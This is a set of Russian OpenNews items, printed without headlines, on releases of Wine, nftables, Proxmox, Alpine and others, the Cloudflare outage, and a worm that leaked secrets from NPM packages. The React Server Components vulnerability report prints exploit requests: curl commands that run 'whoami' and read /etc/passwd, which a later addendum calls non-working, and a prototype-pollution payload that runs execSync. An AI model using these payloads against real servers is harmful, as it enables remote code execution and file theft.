Наиболее важные изменения:

• Движок Wine Mono обновлён до выпуска 10.4.0. Wine Mono представляет собой дистрибутив Framework Mono, предназначенный для использования в Wine вместо проприетарного компонента .NET Framework.
• Данные локализации обновлены до версии Unicode CLDR 48 (Unicode Common Locale Data Repository).
• Реализована поддержка работы на 64-разрядных системах модуля TWAINDSM для сканеров.
• Закрыты отчёты об ошибках, связанные с работой приложений: Photoshop CS 2, Office 2013, Tapps2, DirMaster, Gramps 5.2.0, FL Studio, cmd.exe.
• Закрыты отчёты об ошибках, связанные с работой игр: Resident Evil 2, King's Quest: Mask of Eternity, Mahjong, Mugen, Oblivion, Mass Effect Legendary.

Кроме того, сформирован выпуск проекта Wine Staging 11.0-rc1, предоставляющего расширенные сборки Wine, включающие не полностью готовые или рискованные патчи, пока непригодные для принятия в основную ветку Wine. По сравнению с Wine в Wine Staging предоставляется 253 дополнительных патча. В новом выпуске Wine Staging осуществлена синхронизация с кодовой базой Wine 11.0-rc1 и перенесены свежие изменения из vkd3d.

1. Главная ссылка к новости
2. OpenNews: Новые версии Wine 10.20, Vkd3d 1.18 и vkd3d-proton 3.0
3. OpenNews: Компания Valve представила приставку Steam Machine и VR-шлем Steam Frame, поставляемые с Linux
4. OpenNews: Обновление Steam Client для Linux с включением по умолчанию Proton для запуска Windows-игр
5. OpenNews: Стабильный релиз Proton 10.0, пакета для запуска Windows-игр в Linux

Чтобы защитить системы клиентов от критической уязвимости (CVE-2025-55182) в серверных компонентах фреймворка React, после появления в публичном доступе эксплоита, инженеры Cloudflare реализовали защиту на уровне WAF. С внедрением защиты не всё пошло гладко: в процессе внедрения был увеличен размер буфера для проверки трафика на прокси-серверах, но оказалось, что применяемый для тестирования WAF инструментарий не поддерживает выставленный размер буфера. Так как данный инструментарий не влияет на трафик, было решено отключить его.

Для отключения инженеры воспользовались подсистемой "killswitch" для быстрого изменения конфигурации и отключения отдельных Lua-обработчиков на прокси-серверах без замены правил. Подобный метод отключения правил периодически применяется для быстрого устранения ошибок и приводит к пропуску выполнения части Lua-кода. При этом инженеры не учли, что для вызова отключаемого тестового инструментария в Lua-правилах применялся метод "execute", запускающий дополнительный набор правил. Ранее режим "killswitch" никогда не применялся с правилами, имеющими вызов "execute", и данная комбинация не тестировалась.

Применение "killswitch" привело к тому, что код с определением дополнительного тестового набора правил был отключён, но вызов этого набора правил через "execute" остался. В коде не было дополнительных проверок существования объекта и подразумевалось, что при наличии в наборе правил действия "execute", объект "rule_result.execute" обязательно существует. В итоге, произошла попытка выполнения метода "execute" для неинициализированного объекта, которая привела к аварийному завершению обработчика с ошибкой "attempt to index field 'execute' (a nil value)".

   if rule_result.action == "execute" then
     rule_result.execute.results =  ruleset_results[tonumber(rule_result.execute.results_index)]
   end

1. Главная ссылка к новости
2. OpenNews: Многочасовой сбой Cloudflare оказался результатом некорректной обработки ошибок
3. OpenNews: По статистике Cloudflare 6.8% интернет-трафика является потенциально мусорным
4. OpenNews: Компания Cloudflare раскрыла сведения о взломе одного из своих серверов
5. OpenNews: Уязвимость в cdnjs, позволившая выполнить код на серверах Cloudflare
6. OpenNews: Cloudflare, Tesla многие другие компании скомпрометированы через камеры наблюдения Verkada

В пакет nftables входят компоненты пакетного фильтра, работающие в пространстве пользователя, в то время как на уровне ядра работу обеспечивает подсистема nf_tables, входящая в состав ядра Linux начиная с выпуска 3.13. На уровне ядра предоставляется лишь общий интерфейс, не зависящий от конкретного протокола и предоставляющий базовые функции извлечения данных из пакетов, выполнения операций с данными и управления потоком.

Непосредственно правила фильтрации и специфичные для протоколов обработчики компилируются в байткод в пространстве пользователя, после чего данный байткод загружается в ядро при помощи интерфейса Netlink и выполняется в ядре в специальной виртуальной машине, напоминающей BPF (Berkeley Packet Filters). Подобный подход позволяет значительно сократить размер кода фильтрации, работающего на уровне ядра и вынести все функции разбора правил и логики работы с протоколами в пространство пользователя.

Основные изменения:

• Обеспечена полная поддержка шаблонов легковесных туннелей, таких как vxlan, geneve и erspan:

  
         table netdev global {
                tunnel t1 {
                        id 10
                        ip saddr 192.168.2.10
                        ip daddr 192.168.2.11
                        sport 1025
                        dport 20020
                        ttl 1
                        erspan {
                                version 1
                                index 2
                        }
                }
   
                tunnel t2 {
                        id 10
                        ip saddr 192.168.3.10
                        ip daddr 192.168.3.11
                        sport 1025
                        dport 21021
                        ttl 1
                        erspan {
                                version 1
                                index 2
                        }
                }
     
                chain in {
                        type filter hook ingress device veth0 priority 0;
      
                        tunnel name ip saddr map { 10.141.10.12 : "t1", 
  10.141.10.13 : "t2" } fwd to erspan1
                }
         }
  
  Перед загрузкой правил следует создать сетевой интерфейс erspan1:
     ip link add dev erspan1 type erspan external
  
  

• Добавлена поддержка масок в именах сетевых интерфейсов в обработчиках netdev, например, для добавления базовой цепочки в фильтр входящего трафика для всех устройств vlan можно указать:

  
         table netdev t {
                chain c {
                        type filter hook ingress devices = { "vlan*", "veth0" } 
  priority filter; policy accept;
                }
         }
  

• На системах с ядром Linux 6.18+ реализована поддержка передачи L2-кадров в интерфейс сетевых мостов для локальной обработки, например, для направления в IP-стек всех Ethernet-кадров для MAC-адреса de:ad:00:00:be:ef можно указать:

  
      table bridge global {
              chain pre {
                      type filter hook prerouting priority 0; policy accept;
                      ether daddr de:ad:00:00:be:ef meta pkttype set host ether 
  daddr set meta ibrhwaddr accept
              }
      }
  

• Добавлена новая инфраструктура для fuzzing-тестирования с использованием инструментария afl++ (american fuzzy lop++), включаемая на этапе сборки через "./configure --with-fuzzer".

1. Главная ссылка к новости
2. OpenNews: Выпуск межсетевого экрана firewalld 2.4.0
3. OpenNews: Выпуск пакетного фильтра iptables 1.8.11
4. OpenNews: Выпуск пакетного фильтра nftables 1.1.0
5. OpenNews: Уязвимость в nftables, позволяющая повысить свои привилегии
6. OpenNews: Локальная уязвимость в ядре Linux, эксплуатируемая через nftables

В мае из менеджера сеансов gnome-session был удалён старый код для сохранения сеанса, который был несовместим с компонентами управления сеансом на базе systemd. Старая реализация обеспечивала сохранение списка активных приложений перед завершением сеанса в каталоге ~/.config/gnome-session/saved-session и управлялась через gconf-параметр "auto-save-session", но не работала на системах с systemd.

В конце сентября для GNOME была предложена новая система сохранения сеансов, основанная на использовании systemd. Кроме того был добавлен объект GsmSessionSave, обеспечивающий сохранение состояния отдельных приложений. Помимо сохранения позиций окон после восстановления приложения GNOME также могут включать логику для восстановления состояния, например, GNOME Calculator может восстановить выбранный режим вычислений (базовый, расширенный, для программистов), но не восстанавливает историю операций.

1. Главная ссылка к новости
2. OpenNews: Из GNOME Shell и Mutter удалён код для поддержки X11
3. OpenNews: В GNOME Flatpak Runtime прекращена поддержка 32-разрядных приложений
4. OpenNews: Выпуск среды рабочего стола GNOME 49
5. OpenNews: В KDE реализована начальная поддержка восстановления сеансов на базе Wayland
6. OpenNews: В GNOME будет усилена зависимость от systemd

Помимо пакета с ядром из состава RHEL (на базе ядра 6.12) в Oracle Linux предложено собственное ядро Unbreakable Enterprise Kernel 8.1 (UEK 8U1), также основанное на ядре Linux 6.12 и оптимизированное для работы с промышленным программным обеспечением и оборудованием Oracle. В обновлении ядра UEK 8U1 по умолчанию включена опция SECURITY_DMESG_RESTRICT, разрешающая доступа к dmesg только при наличии прав root. Драйверы megaraid_sas, mpi3mr и mpt3sas бэкпортированы из ядра 6.15.

Исходные тексты ядра, включая разбивку на отдельные патчи, доступны в публичном Git-репозитории Oracle. Ядро Unbreakable Enterprise Kernel устанавливается по умолчанию, позиционируется в качестве альтернативы штатному пакету с ядром RHEL и предоставляет ряд расширенных возможностей, таких как интеграция DTrace и улучшенная поддержка Btrfs. Кроме дополнительного ядра по функциональности выпуски Oracle Linux 10.1 и RHEL 10.1 полностью идентичны (список изменений можно посмотреть в анонсе RHEL 10.1).

1. Главная ссылка к новости
2. OpenNews: Выпуск дистрибутива Oracle Linux 9.7
3. OpenNews: Выпуск дистрибутива Oracle Linux 10
4. OpenNews: Релиз Red Hat Enterprise Linux 9.7 и 10.1
5. OpenNews: Доступен дистрибутив AlmaLinux 10.1
6. OpenNews: Выпуск дистрибутива Rocky Linux 10.1

Proxmox Datacenter Manager позволяет через один web-интерфейс инспектировать все подключённые узлы и кластеры, управлять сложными и распределёнными инфраструктурами с масштабированием от отдельных локальных установок до управления территориально разделёнными датацентрами. Среди прочего возможно централизованное выполнение таких действий, как live-миграция виртуальных машин между разными кластерами. Бэкенд и интерфейс оптимизированы для управления большим числом узлов, например, в тестовом внедрении показана возможность управления более 5 тысячами хостов и 10 тысячами виртуальных машин.

Основные возможности:

• Системное окружение на базе Debian 13.2, ядра Linux 6.17 и OpenZFS 2.3.4.
• Поддержка аутентификации через LDAP, Active Directory и OpenID Connect.
• Возможность управления системами, использующими Proxmox Virtual Environment и Proxmox Backup Server.
• Возможность создания в web-интерфейсе настраиваемых сводных экранов (dashboard), представлений и отчётов о состоянии c поддержкой фильтрации и сортировки по хостам, ресурсам, типу ресурсов и привязанным тегам. Возможно выборочное предоставление доступа сотрудников только к необходимым dashboard-ам без открытия доступа к остальным частям интерфейса и возможностям администрирования.
• Система централизованного сбора, агрегирования и визуализации метрик. Единый интерфейс для оценки общего состояния всех кластеров и потребления критических ресурсов, таких как CPU, ОЗУ и ввод/вывод. Визуализация ключевых индикаторов и метрик производительности для выявления на ранней стадии узких мест и потенциальных проблем. Локальное кэширование метрик с возможностью просмотра последнего известного состояния в случае аварий и нарушений сетевой связанности.
• Возможность поиска ресурсов с фильтрации по их типу (сервер, VM, контейнер), состоянию и тегам. Поддержка языка поисковых запросов в стиле Elasticsearch и GitHub
• Система управления привилегиями пользователей на базе RBAC (Role-Based Access Control) и сводная система логов для упрощения аудита и отслеживания истории выполнения операций.
• Централизованное управление жизненным циклом виртуальных машин и контейнеров в инфраструктуре виртуализации. Выполнение запуска, остановки и настройки виртуальных машин, контейнеров и хранилищ данных через один интерфейс.
• Централизованный механизм управления установкой обновлений и отслеживания актуальности версий программ. Поддержка инициирования прямой установки обновлений и патчей через интерфейс Proxmox Datacenter Manager. Унифицированный доступ по SSH ко всем подключённым хостам из одной консоли.
• Начальная интеграция стека программно определяемых сетей (SDN, Software-Defined Networking) с межкластерным сетевым взаимодействием на базе EVPN (Ethernet VPN) и созданием виртуальных сетей (VNet).

1. Главная ссылка к новости
2. OpenNews: Доступен дистрибутив Proxmox Backup Server 4.1
3. OpenNews: Выпуск Proxmox VE 9.1, дистрибутива для организации работы виртуальных серверов
4. OpenNews: Выпуск дистрибутива Proxmox Mail Gateway 8.2
5. OpenNews: Выпуск облачной платформы Apache CloudStack 4.18
6. OpenNews: Выпуск XCP-ng 8.3, свободного варианта XenServer

Устранённые уязвимости (первые 2 имеют умеренный уровень опасности, а остальные низкий):

• CVE-2025-66200 - организация запуска CGI-скрипта под другим пользователем в конфигурациях с mod_userdir и suexec через манипуляции с директивой "RequestHeader" в файле .htaccess (если разрешено её использование .htaccess).
• CVE-2025-59775 - SSRF-уязвимость (Server-Side Request Forgery), приводящая к утечке NTLM-хэша на другой сервер при использовании Apache httpd на платформе Windows в конфигурациях c настройками "AllowEncodedSlashes On" и "MergeSlashes Off".
• CVE-2025-65082 - переопределение переменных окружения для CGI-скриптов из-за некорректного экранирования управляющих символов (выставление переменных в настройках может переопределить значения переменных, вычисленные сервером для CGI).
• CVE-2025-58098 - передача экранированной строки запроса в SSI (Server Side Includes) директиву "<!--#exec cmd=...-->" в конфигурациях с mod_cgid вместо mod_cgi.
• CVE-2025-55753 - отправка непрерывных (без задержки между запросами) повторных ACME-запросов обновления сертификата в модуле mod_md после большого числа сбоев при попытке обновления просроченного сертификата.

Среди не связанных с безопасностью улучшений:

• Модуль mod_md с реализацией протокола ACME обновлён до версии 2.6.6:
  • Добавлена поддержка расширения протокола ARI (ACME Renewal Information), позволяющего получать сведения о необходимости обновления сертификатов и выбирать оптимальное время для обновления. Для включения ARI предложена директива "MDRenewViaARI on|off".
  • Реализована директива "MDInitialDelay" для выставления задержки проверки сертификата после перезапуска сервера.
  • До 30 секунд увеличено значение по умолчанию параметра MDRetryDelay (задержка перед повторной попыткой после ошибки).
  • Прекращена поддержка VPN-сети Tailscale.
  • Устранены ошибки и утечка памяти.
• Модуль mod_http2 обновлён до версии 2.0.35, в которой появилась директива "H2MaxStreamErrors" для задания лимита на число ошибок в потоке, после достижения которого соединение будет закрыто.
• В mod_http2 налажена корректная обработка ответов с кодом 3 от mod_cache.
• В mod_proxy_http2 реализована директива "ProxyErrorOverride" для переопределения кодов ошибок.
• В mpm_common добавлена директива "ListenTCPDeferAccept", через которую можно выставить значение опции TCP_DEFER_ACCEPT (активация только при приходе данных на сокет) для слушающего сокета.
• В mod_ssl добавлена директива "SSLVHostSNIPolicy" для настройки правил совместимости для виртуальных хостов.

1. Главная ссылка к новости
2. OpenNews: Фонд Apache сменил логотип и начал использование акронима ASF
3. OpenNews: В http-сервере Apache 2.4.65 устранена проблема, ломающая работу mod_rewrite
4. OpenNews: Релиз http-сервера Apache 2.4.64 с устранением 8 уязвимостей
5. OpenNews: Для systemd развивается возможность загрузки системных образов по HTTP
6. OpenNews: Уязвимость в реализациях протокола HTTP/2, упрощающая проведение DoS-атак

Среди изменений в новой версии:

• Firefox и Thunderbird обновлены до ESR-ветки 140 (ранее использовалась ветка 128).
• В состав включён набор компиляторов GCC 15.2 Обновлены версии GCC 12.5.0 и 13.4.0.
• Обновлены версии программ, среди которых BIND 9.18.41, 7-Zip 25.01, git 2.50.1, golang 1.25.3, openssl 3.0.18, sudo 1.9.17p1, suricata 7.0.11, vim 9.1.1591, babel 2.17.0, flac 1.5.0, libjpeg 9f, openldap 2.6.10, rust 1.87.0, wxwidgets 3.2.8.1 и xorg-server 21.1.18.
• В утилиту useradd добавлена опция "-N" для активации учётной записи без необходимости отдельного запуска утилиты "passwd -N" или указания пароля. Также добавлена опция "-U" для перевода учётной записи в неактивированное состояние (UP). В состоянии UP запрещено подключение пользователя к системе даже при подсоединении без пароля по SSH-ключу.
• В утилиту sxadm добавлена поддержка включения защиты от микроархитектурной атаки TSA (Transient Scheduler Attack) на CPU AMD.
• В утилиту fmthard добавлена опция "-c" (clear) для очистки меток разделов MBR, VTOC и GPT/EFI, а также опция "-e" (GPT/EFI) для принудительного сохранения метки GPT/EFI вместо VTOC.
• Добавлен системный сервис svc:/system/check/bind для проверки конфигурации DNS-сервера BIND через запуск утилиты named-checkconf.
• В croinfo добавлена новая команда cableinfo для вывода информации о применяемых SAS-кабелях (Serial-Attached SCSI).
• В утилиту ldm добавлены команды add-devalias, list-devalias и remove-devalias для управления псевдонимами устройств для гостевых систем в LDoms Manager (ldmd).
• В команде zoneadm добавлена поддержка образов изолированных зон в форме архивов flar, сжатых при помощи gzip/bzip2 (например: "zoneadm -z s10z install -u -a /root/s10u11-x86.flar.bz2").
• В отладчик MDB добавлена поддержка вывода аннотаций по типу и выставления размеров массивов.
• Добавлен пакет pkg:/system/management/oracle-cloud-agent с плагинами gomon (мониторинг производительности) и runcommand для Oracle Cloud Agent.

1. Главная ссылка к новости
2. OpenNews: Выпуск операционной системы Solaris 11.4 SRU84
3. OpenNews: Выпуск дистрибутива OpenIndiana 2025.10, продолжающего развитие OpenSolaris
4. OpenNews: Выпуск дистрибутива Tribblix 38, построенного на технологиях OpenSolaris и Illumos
5. OpenNews: Выпуск дистрибутива OmniOS CE r151056, построенного на технологиях OpenSolaris
6. OpenNews: Oracle опубликовал новую бесплатную редакцию Solaris 11.4 CBE

В GitHub выявлено более 30 тысяч репозиториев с сохранёнными червём перехваченными данными. В около 70% из этих репозиториев размещён файл content.json, в 50% - файл truffleSecrets.json, а в 80% - environment.json, содержащие ключи доступа, конфиденциальные данные и переменные окружения, найденные на системе разработчика, установившего вредоносный пакет с червём. Также в данных репозиториях выявлено около 400 файлов actionsSecrets.json с ключами, найденными в окружениях для выполнения GitHub Actions.

В файлах contents.json присутствовало более 500 уникальных учётных данных и токенов для подключения к GitHub. В файлах truffleSecrets.json содержались конфиденциальные данные, найденные в результате выполнения на поражённой системе утилиты TruffleHog, собирающей более 800 типов данных, среди которых ключи доступа, ключи шифрования, пароли и токены, используемые в различных сервисах, облачных окружениях, продуктах и СУБД. Всего в truffleSecrets.json выявлено более 400 тысяч уникальных записей из которых около 2.5% (~10000) было верифицировано.

Предполагается, что попавшая в открытый доступ конфиденциальная информация может стать отправной точкой для новой волны атак, так как многие данные остаются актуальны. Например, проверка показала, что 60% токенов доступа к NPM, захваченных с поражённых червём систем, остаются действующими.

В отчёте также приводится общая статистика, полученная на основе анализа переменных окружения с поражённых систем. 23% запусков червя произошли на компьютерах разработчиков, а 77% - в окружениях систем непрерывной интеграции (60% GitHub Actions, 5% - Jenkins, 5% - GitLab CI, 3% - AWS CodeBuild). На 87% систем использовался Linux, 12% - macOS и 1% - Windows. 76% запусков было в контейнерах, 13% - в основных системах.

60% всех инфицированний произошло из-за установки вредоносных релизов пакетов @postman/tunnel-agent-0.6.7 и @asyncapi/specs-6.8.3. В 99% проценте случаев червь был активирован при запуске команды "node setup_bun.js", указанной в package.json в секции preinstall (оставшиеся 1% вероятно приходятся на попытки тестирования).

1. Главная ссылка к новости
2. OpenNews: При помощи червя Shai-Hulud скомпрометировано 600 NPM-пакетов
3. OpenNews: Самораспространяющийся червь поразил 187 пакетов в NPM
4. OpenNews: Утечка токена для полного доступа к GitHub-репозиториям проекта Python
5. OpenNews: В 2024 году GitHub выявил 39 млн утечек ключей и паролей в репозиториях
6. OpenNews: Уязвимость в MCP-сервере GitHub, приводящая к утечке информации из приватных репозиториев

Основные возможности сервиса:

• Высокая производительность и низкое потребление памяти, благодаря использованию компилируемого в машинный код языка без сборoщика мусора.
• Предоставление информации об IP-адресе (страна, город, почтовый индекс, координаты, оператор связи и др.) через REST API на основе данных MaxMind GeoLite2 (бесплатно) и MaxMind GeoIP2 (платно).
• Определение текущего IP-адреса пользователя (доступно через отдельный эндпойнт; параметр ip основного эндпойнта является необязательным).
• Настраиваемые автоматические обновления баз данных (как с официальных ресурсов MaxMind с использованием Account ID и Licence Key, так и с пользовательского URL с поддержкой авторизации; возможно указание интервала проверки обновлений).
• Веб-интерфейс для ручной отправки запросов, включая опциональную поддержку отображения на карте OpenStreetMap.
• Для всех результатов, содержащих поле timezone, автоматически формируется дополнительное поле posix_timezone (например, Europe/Paris преобразуется в CET-1CEST,M3.5.0,M10.5.0/3). Это обеспечивает автоматическую конфигурацию часового пояса на встраиваемых устройствах (например, ESP32 и иных таргетах newlib без встроенной tzdata). Данная возможность является уникальной и отсутствует в аналогичных решениях.
• Автоматическое обновление базы данных часовых поясов (интервал, источник и авторизация настраиваются; по умолчанию используется официальный сайт IANA). При отключении обновлений применяется системная база.
• Возможность загрузки актуальных архивов баз данных по HTTP непосредственно с сервиса (что позволяет использовать один экземпляр в качестве прокси-источника для других и снижать расход квоты MaxMind).
• Поддержка защиты эндпойнтов с помощью опционального API-ключа.
• Наличие OpenAPI-спецификации и встроенного Swagger UI для облегчения интеграции со своими проектами.
• Предоставление готового Docker-образа для быстрого развертывания:

  
  docker run \
  	-e MAXMIND_ACCOUNT_ID=XXXX \
  	-e MAXMIND_LICENCE_KEY=YYYY \
  	-e OSM_TILES_URL="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" \  # необязательно
  	-v geoip_data:/data \
  	-p 8080:8080 \
  	ghcr.io/quoi-dev/geoip:latest
  

1. Главная ссылка к новости
2. OpenNews: Mozilla закрывает общедоступный сервис определения местоположения
3. OpenNews: Выпуск zeronet-conservancy 0.7.8, платформы для децентрализованных сайтов
4. OpenNews: Представлен gps-share, инструмент для организации совместного доступа к GPS
5. OpenNews: Выпуск GeoClue 2.3.0, фреймворка для определения местоположения

В новом выпуске:

• После пяти лет разработки опубликован пакетный менеджер apk 3.0. В версии Alpine Linux 3.23 задействованы новые утилиты apk, но пока продолжено использования второй версии формата пакетов и индекса (переход на третью версию запланирован в одном из следующих выпусков).

  Среди изменений в apk 3.0:

  • Новый формат пакетов, поддерживающий алгоритм сжатия zstd и цифровые подписи на базе нового алгоритма, а также предусматривающий возможность верификации данных в БД пакетного менеджера, используя оригинальные подписи пакетов.
  • Поддержка использования в индексе новых алгоритмов хэширования (SHA-256, SHA-512).
  • Удалена поддержка FTP, первой версии формата пакетов и md5-хэшей.
  • Добавлена проверка соответствия архитектуры устанавливаемого пакета с архитектурой системы.
  • Для разделения вывода скриптов и утилиты apk к выводу скриптов теперь добавляется префикс '*'.
  • В формат файлов конфигурации репозитория добавлена поддержка определения и использования переменных.
  • Добавлена поддержка выноса настроек по умолчанию в отдельный файл конфигурации.
  • Добавлены новые команды: apk mkpkg для создания пакетов, apk mkndx для создания индекса, apk adbsign для управления цифровыми подписями и apk adbdump для дампа структур.
  • Добавлена команда "apk query" для получения информации о пакетах из установленных БД и индексов, сочетающая возможности команд info, list и search.
• Добавлена опциональная возможность переноса всех исполняемых файлов и библиотек из корневых каталогов в раздел /usr (/bin, /sbin и /lib* унифицированы с соответствующими каталогами внутри /usr и оформлены через символические ссылки на них). Для задействования подобного слияния во время установки следует выставить переменную окружения BOOTSTRAP_USR_MERGED перед вызовом утилиты setup-disk. На уже имеющихся системах для слияния можно использовать пакет merge-usr.
• Пакет с ядром Linux "linux-edge" заменён на "linux-stable", который отличается использованием идентичных настроек с пакетом "linux-lts". В пакете linux-stable используются все стабильные ветки ядра, а в linux-lts - только, помеченные как LTS.
• Прошивки для беспроводных адаптеров Intel, поддерживаемых драйвером iwlwifi, перенесены из пакета linux-firmware-other в linux-firmware-intel.
• Добавлен метапакет LLVM, ссылающийся на свежий выпуск LLVM.
• Наборы правил nftrules и udev разделены на подпакеты ($pkgname-nftrules и $pkgname-udev), предоставляющие правила межсетевого экрана и udev в привязке к пакетам. Аналогично выполнено разделение на подпакеты $pkgname-systemd сервисов systemd (по умолчанию переход с OpenRC на systemd не планируется). Для установки всех правил nftrules добавлен метапакет nftables-rulesets.
• Сервер nginx собран с опцией "--with-compat" для обеспечения совместимости со сторонними динамически загружаемыми модулями. Добавлен пакет nginx-mod-dev с кодом nginx и сборочными зависимостями, необходимыми для сборки модулей.
• Предложены пакеты с новыми версиями графических окружений GNOME 49, KDE Plasma 6.5.3, LXQt 2.3.0, Sway 1.11.
• Обновлены версии пакетов, например, доступны выпуски ядра Linux 6.18, GCC 15, LLVM 21, busybox 1.37.0, Node.js 24.11, Rust 1.91, Valkey 9.0, OpenZFS 2.4.0-rc4, Crystal 1.18, Docker 29, .NET 10.0, Go 1.25, Kea 3.0, OpenJDK 25, Perl 5.42, PHP 8.5, PostgreSQL 18, Qt 6.10, ffmpeg 8, wlroots 0.19.
  1. Главная ссылка к новости
  2. OpenNews: Релиз минималистичного дистрибутива Alpine Linux 3.22
  3. OpenNews: В postmarketOS и Alpine добавлена поддержка среды рабочего стола COSMIC
  4. OpenNews: Alpine Linux покинул наиболее активный сопровождающий
  5. OpenNews: Уязвимость в пакетном менеджере APK, позволяющая удалённо выполнить код в Alpine Linux
  6. OpenNews: Marathon OS - мобильная ОС в стиле BlackBerry 10 на базе Linux, Qt и Wayland

Ранее разработчики MinIO высказывали недовольство использованием их разработок в сторонних проприетарных продуктах без выполнения условий лицензии AGPL и без указания авторства (например, одна из компаний пыталась продавать полный клон MinIO, рекламируя его как более производительный, чем MinIO). Текущая кодовая база остаётся под лицензией AGPL 3.0 и при желании заинтересованные участники могут создать форк и развивать его своими силами. Из существующих открытых альтернатив можно отметить AIStore, Garage, Ambry, SeaweedFS, RustFS, hs5 и Versity S3 Gateway.

1. Главная ссылка к новости
2. OpenNews: Открыт код распределённой файловой системы TernFS
3. OpenNews: СУБД ScyllaDB перешла с AGPL на проприетарную лицензию
4. OpenNews: Первый публичный выпуск распределённой файловой системы JuiceFS
5. OpenNews: Компания Versity открыла исходные тексты файловой системы ScoutFS
6. OpenNews: Открыт код распределённой файловой системы 3FS, используемой в DeepSeek

Проблема вызвана небезопасной десериализацией данных, полученных в HTTP-запросах к серверным обработчикам. Исправление свелось к замене в функции requireModule выражения "return moduleExports[metadata[NAME]];", не исключавшего подстановку прототипа, на вариант с проверкой через hasOwnProperty:

   if (hasOwnProperty.call(moduleExports, metadata[NAME])) {
       return moduleExports[metadata[NAME]];
   }
   return (undefined: any);

При наличии возможности подставить прототип, запуск команд в системе или выполнение JavaScript-кода в контексте текущего процесса (с обходом sandbox-изоляции) можно организовать через подстановку методов "vm.runInThisContext", "vm.runInNewContext", "child_process.execFileSync" и "child_process.execSync". Также возможно использование методов "fs.readFileSync" и "fs.writeFileSync" для чтения и записи произвольных файлов на сервере, насколько позволяют текущие права доступа (например, можно перезаписать ~/.ssh/authorized_keys и ~/.bashrc). Для атаки не требуется прохождение аутентификации. Доступен эксплоит.

   # Запуск команды whoami
   curl -X POST http://localhost:3002/formaction \
     -F '$ACTION_REF_0=' \
     -F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}'

   # Выполнение JavaScript-кода 1+1
   curl -X POST http://localhost:3002/formaction \
     -F '$ACTION_REF_0=' \
     -F '$ACTION_0:0={"id":"vm#runInThisContext","bound":["1+1"]}'

   # Чтение файла /etc/passwd
   curl -X POST http://localhost:3002/formaction \
     -F '$ACTION_REF_0=' \
     -F '$ACTION_0:0={"id":"fs#readFileSync","bound":["/etc/passwd","utf8"]}'

Подверженность систем уязвимости зависит от применения на них уязвимых серверных компонентов react-server-dom-webpack, react-server-dom-parcel и react-server-dom-turbopack (среди прочего, web-приложение может не использовать их, но установить на сервере). Приложения, не использующие react-server, уязвимость не затрагивает.

Степень охвата уязвимостью рабочих систем, в которых используется React, пока не ясна. С одной стороны, React является одним из самых популярных web-фреймворков (используется примерно на 6% web-сайтов), а уязвимые компоненты развиваются в основном репозитории и входят в состав релизов. Уязвимые компоненты также поддерживаются в основанных на React фреймворках, таких как Next.js и react-router. По данным компании Wiz Research уязвимые экземпляры Next.js или React выявлены в 39% проанализированных облачных окружений.

С другой стороны, генерация контента на сервере через React Server Components не часто используемая функция (большинство React-сайтов отрисовывают интерфейс только на стороне клиента), а уязвимые компоненты помечены как экспериментальные и не гарантирующие корректную работу. Данные компоненты имеют относительно небольшое число прямых загрузок из репозитория NPM: react-server-dom-webpack - 670 тысяч в неделю, react-server-dom-parcel - 7 тысяч и react-server-dom-turbopack - 32 тысячи, для сравнения NPM-пакет React имеет 45 млн загрузок в неделю.

Уязвимость присутствует версиях React 19.0.0, 19.1.0, 19.1.1 и 19.2.0, и устранена в обновлениях React 19.0.1, 19.1.2 и 19.2.1. Уязвимые компоненты также применяются в пакетах react-router (20 млн загрузок в неделю), waku, @parcel/rsc (Parcel RSC plugin), @vitejs/plugin-rsc (Vite RSC plugin) и rwsdk (RedwoodSDK). В React Router проблема проявляется только при использовании экпериментального режима RSC.

Аналогичная уязвимость (CVE-2025-66478) выявлена в реализации протокола RSC (React Server Components) во фреймворке Next.js (16 млн загрузок в неделю). Проблема затрагивает приложения, использующие App Router и ветки Next.js 15.x и 16.x. Утверждается, что уязвимость проявляется в конфигурации Next.js по умолчанию (стандартное приложение, создаваемое утилитой create-next-app, подвержено атаке). Пользователям рекомендовано как можно скорее установить обновление Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 или 16.0.7.

Дополнение 1: Пример эксплоита оказался не действующим. Общий принцип эксплуатации и метод атаки через прототипы объектов подтверждены, но привязка к модулям vm, child_process и fs ошибочна (в пока не опубликованном реальном эксплоите задействовано какое-то не привязанное к внешним модулям внутреннее свойство).

Дополнение 2: Исследователь, изначально выявивший уязвимость, опубликовал рабочие прототипы эксплоитов. Также доступно несколько сторонних вариантов эксплоитов (1, 2, 3), созданных путём изучения патча. Суть атаки в использовании десериализации $@ для получения ссылки на Chunk и помещения Chunk.prototype.then в качестве свойства "then" корневого объекта. Пример запроса для запуска xcalc:

   Content-Disposition: form-data; name="0"

   "then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}

   Content-Disposition: form-data; name="1"

   "$@0"

1. Главная ссылка к новости
2. OpenNews: Атака на Node.js через манипуляции с прототипами объектов JavaScript
3. OpenNews: Google продемонстрировал эксплуатацию уязвимостей Spectre через выполнение JavaScript в браузере
4. OpenNews: В репозитории Hugging Face выявлены вредоносные AI-модели, выполняющие код
5. OpenNews: Критическая уязвимость в Apache Log4j 2, затрагивающая многие Java-проекты
6. OpenNews: Критическая 0-day уязвимость в Spring Framework, применяемом во многих Java-проектах

ODF представляет собой основанный на XML, независимый от приложений и платформ файловый формат для хранения документов, содержащих текст, электронные таблицы, диаграммы и графические элементы. Спецификации также включают требования к организации чтения, записи и обработки подобных документов в приложениях. Стандарт ODF применим для создания, редактирования, просмотра, обмена и архивирования документов, которые могут представлять собой текстовые документы, презентации, электронные таблицы, растровые графические материалы, векторные рисунки, схемы и другие типы контента.

Наиболее заметные изменения в OpenDocument 1.4:

• Расширен спектр объектов, для которых возможно использование сложного фона, такого как цветовые градиенты и штриховка.
• В фигуры, такие как прямоугольники и блок-схемы, помимо голого текста и списков, разрешено встраивать таблицы.
• Добавлена возможность пометки декоративных объектов для их игнорирования в инструментах для людей с ограниченными возможностями, таких как экранные ридеры.
• Расширены и уточнены возможности для работы с текстом на языках с разными направлениями письма (слева направо, справа налево, сверху вниз).
• Улучшен метод задания маркеров (handles), определяющих каркас сложных фигур.
• Предложен более гибкий метод определения формата нумерованных меток в многоуровневых списках.
• В текстовых документах: Разрешено позиционировать объекты относительно полей страницы. Добавлена возможность указания межколоночного интервала (гаттера) в формате страницы. Добавлены дополнительные свойства для более гибкого управления наложением объектов.
